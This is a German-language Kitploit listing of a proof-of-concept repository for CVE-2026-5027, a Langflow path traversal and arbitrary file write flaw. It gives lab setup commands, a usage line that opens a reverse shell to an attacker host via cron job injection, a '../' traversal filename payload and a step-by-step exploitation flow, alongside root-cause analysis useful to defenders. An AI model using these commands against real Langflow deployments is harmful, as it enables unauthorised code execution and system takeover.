Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-5027 — Langflow, Entfernte Codeausführung (RCE) durch Cron-Job-Injection mittels Path Traversal | Kitploit
Tools/GitHubGitHub/eqstlab/cve-2026-5027
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubeqstlab/cve-2026-5027

CVE-2026-5027

Langflow, Entfernte Codeausführung (RCE) durch Cron-Job-Injection mittels Path Traversal

Repository anzeigen
3vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Dieser Beitrag ist ein Forschungsartikel, veröffentlicht von EQSTLab.

Dank an Yahia Hamza, der diese Schwachstelle gemeldet und analysiert hat.

CVE-2026-5027

★ CVE-2026-5027 Langflow Pfad-Traversal / Beliebiger Dateischreibzugriff PoC ★ CVE-2026-5027 PoC-Test


Beschreibung

CVE-2026-5027 : Langflow Schwachstelle für beliebigen Dateischreibzugriff

Eine Pfad-Traversal-Schwachstelle in Langflow <= 1.8.4 erlaubt Angreifern, beliebige Dateien außerhalb des vorgesehenen Upload-Verzeichnisses zu schreiben, indem ein manipulierter Multipart-filename an den Endpunkt /api/v2/files übergeben wird. In Bereitstellungen, in denen Auto-Login aktiviert oder die Authentifizierung anderweitig schwach durchgesetzt ist, kann dieses Problem ausgenutzt werden, um Remote-Code-Ausführung zu erreichen, indem vom Angreifer kontrollierter Inhalt in sensible Dateisystempfade geschrieben wird.


Laboraufbau

Erstellen und Ausführen der verwundbaren Umgebung mit Docker:

Image erstellen

root@kitploit:~
docker build -t cve-2026-5027 .

Container ausführen

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

Verwendung

Ausführung

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

Analyse

Verwundbarer Endpunkt

root@kitploit:~
POST /api/v2/files

Das Problem besteht, weil die Upload-Funktion dem vom Client bereitgestellten Multipart-filename-Wert vertraut. Anstatt einen sicheren serverseitigen Speichernamen zu generieren oder den aufgelösten Pfad auf ein dediziertes Upload-Verzeichnis zu beschränken, erlaubt der verwundbare Codepfad Traversal-Sequenzen wie ../, den endgültigen Zielpfad zu beeinflussen.

Infolgedessen kann ein Angreifer den vorgesehenen Speicherstamm umgehen und die Anwendung zwingen, Dateien an beliebige Stellen im Server-Dateisystem zu schreiben.

Ein repräsentativer Exploit-Ablauf ist wie folgt:

  1. Erhalten Sie ein Zugriffstoken durch normale Anmeldung oder eine Auto-Login-fähige Bereitstellung.
  2. Senden Sie eine Multipart-Upload-Anfrage an /api/v2/files.
  3. Übergeben Sie einen manipulierten filename mit Pfad-Traversal-Sequenzen.
  4. Veranlassen Sie Langflow, vom Angreifer kontrollierten Inhalt außerhalb des erwarteten Speicherverzeichnisses zu schreiben.

Dies ist im Kern ein CWE-22: Unzureichende Einschränkung eines Pfadnamens auf ein eingeschränktes Verzeichnis-Problem.

Technische Ursache

Der Sicherheitsfehler wird durch unzureichende Bereinigung und Validierung benutzergesteuerter Dateipfade während der Upload-Verarbeitung verursacht. Die Anwendung akzeptiert den ursprünglichen Client-Dateinamen und übergibt ihn an den Speicherworkflow, ohne die Pfadnormalisierung und -begrenzung angemessen durchzusetzen.

Aus defensiver Sicht ist das gefährliche Muster konzeptionell ähnlich wie das Folgende:

root@kitploit:~
save_path = base_dir / file.filename

Wenn file.filename Pfad-Traversal-Komponenten wie enthält:

root@kitploit:~
../../../../tmp/poc.txt

kann der endgültig aufgelöste Pfad außerhalb von base_dir zeigen, was einen beliebigen Dateischreibzugriff ermöglicht.

Warum dies wichtig ist

Schwachstellen für beliebiges Dateischreiben sind oft schwerwiegender als standardmäßige uneingeschränkte Upload-Probleme, da der Angreifer nicht nur den Dateiinhalt, sondern auch den Zielpfad kontrolliert. Abhängig von den Laufzeitberechtigungen des Langflow-Prozesses kann dies Folgendes ermöglichen:

  • Überschreiben von Anwendungsdateien
  • Modifikation von Start- oder geplanten Task-Dateien
  • Persistenz durch Shell-Initialisierung oder Schlüsseldateien
  • Eskalation von beliebigem Dateischreiben zu Remote-Code-Ausführung

Szenario

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

Haftungsausschluss

Dieses Repository ist nicht dazu gedacht, die unbefugte Ausnutzung von Langflow-Instanzen zu erleichtern. Der Zweck dieses Projekts ist es, Sicherheitsforschern, Verteidigern und Entwicklern zu helfen, die Schwachstelle zu verstehen, die Gefährdung in kontrollierten Umgebungen zu validieren und wirksame Gegenmaßnahmen anzuwenden.


Referenzen

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

Tool herunterladen